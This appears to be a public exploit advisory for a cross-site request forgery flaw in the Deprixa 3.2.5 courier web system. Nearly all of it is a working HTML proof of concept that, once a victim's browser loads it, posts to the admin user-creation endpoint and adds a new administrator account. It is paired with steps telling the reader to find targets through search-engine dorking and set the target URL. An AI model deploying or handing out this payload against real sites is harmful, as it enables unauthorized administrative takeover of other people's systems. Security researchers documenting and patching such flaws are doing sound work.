Headline
Deprixa 3.2.5 Cross Site Request Forgery
Deprixa version 3.2.5 suffers from a cross site request forgery vulnerability.
====================================================================================================================================
| # Title : Deprixa 3.2.5 CSRF Vulnerability |
| # Author : indoushka |
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 103.0(64-bit) |
| # Vendor : https://themes-dl.com/nulled-courier-deprixa-pro-integrated-web-system-v3-2-5-free-download/ |
====================================================================================================================================
poc :
[+] Dorking İn Google Or Other Search Enggine.
[+] The following html code create a new admin .
[+] Go to the line 11.
[+] Set the target site link Save changes and apply .
[+] infected file : /dashboard/settings/addusersadmin/agregar.php.
<!-- Modal nuevo usuario -->
<div class="modal fade" id="nuevo" tabindex="-1" role="dialog" aria-labelledby="myModalLabel" aria-hidden="true">
<div class="modal-dialog">
<div class="modal-content">
<div class="modal-header">
<button type="button" class="close" data-dismiss="modal"><span aria-hidden="true">×</span><span class="sr-only">Close</span></button>
<h4 class="modal-title" id="myModalLabel"><i class="fa fa-user-plus"></i>New Administrator</h4>
</div>
<div class="modal-body">
<!–Cuerpo del modal aquí el formulario–>
<form action="https://127.0.0.1/deprixalogisticsonline/dashboard/settings/addusersadmin/agregar.php" data-parsley-validate novalidate method="post" class="form-horizontal" enctype="multipart/form-data">
<div class="form-group " id="gnombrepa">
<label for="off_name" class="col-sm-2 control-label"></label>
<div class="col-sm-10">
<input type="text" class="form-control off_name" parsley-trigger="change" required name="name_parson" placeholder="Administrator Name">
</div>
</div>
<div class="form-group" id="gapellido">
<label for="email" class="col-sm-2 control-label">Email</label>
<div class="col-sm-5">
<input type="text" class="form-control email" name="email" id="id_mail" placeholder="[email protected]" required onKeyUp="javascript:validateMail(‘id_mail’)“>
<strong><span id="emailOK"></span></strong>
<p class="error"></p>
</div>
<div class="col-sm-5">
<input class="form-control phone” name="phone" parsley-trigger="change" required placeholder="Phone">
</div>
</div>
<div class="form-group" id="gemail">
<label for="office" class="col-sm-2 control-label">Office</label>
<div class="col-sm-5">
<input type="text" class="form-control office" parsley-trigger="change" required name="office" placeholder="Name of the Office">
</div>
<div class="col-sm-5">
<select type="text" class="form-control role" name="role" >
<option value="Administrator">Administrator</option>
</select>
</div>
</div>
<div class="form-group " id="gnombre">
<label for="off_name" class="col-sm-2 control-label">User</label>
<div class="col-sm-10">
<input type="text" class="form-control off_name" parsley-trigger="change" required name="name" placeholder="Username">
</div>
</div>
<div class="form-group" id="gpassword">
<label for="pwd" class="col-sm-2 control-label">Password</label>
<div class="col-sm-10">
<input type="text" class="form-control pwd" parsley-trigger="change" required name="pwd" placeholder="Password">
</div>
</div>
</br></br>
<div class="col-sm-offset-2 col-sm-10">
<div class="checkbox">
<label class="i-checks i-checks-sm">
<input type="checkbox" name="estado" value="1" onclick="return false" checked >
<i></i>
State </label>
</div>
<div class="checkbox">
<label class="i-checks i-checks-sm">
<input type="checkbox" name="type" value="a" onclick="return false" checked >
<i></i>
User Type </label>
</div>
</div>
<!--Fin del cuerpo del modal-->
</div>
</br></br>
<div class="modal-footer">
<button type="button" class="btn btn-default" data-dismiss="modal"><i class="fa fa-times"></i>
Close</button>
<input class="btn btn-success" name="Submit" type="submit" id="submit" value="Save">
</div>
</form>
</div>
</div>
</div>
Greetings to :=========================================================================================================================
jericho * Larry W. Cashdollar * brutelogic* shadow_00715 9aylasdjroot.dzLiquidWormHussin-X*D4NB4R *ViRuS_Ra3cH yasMouh CraCkEr |
=======================================================================================================================================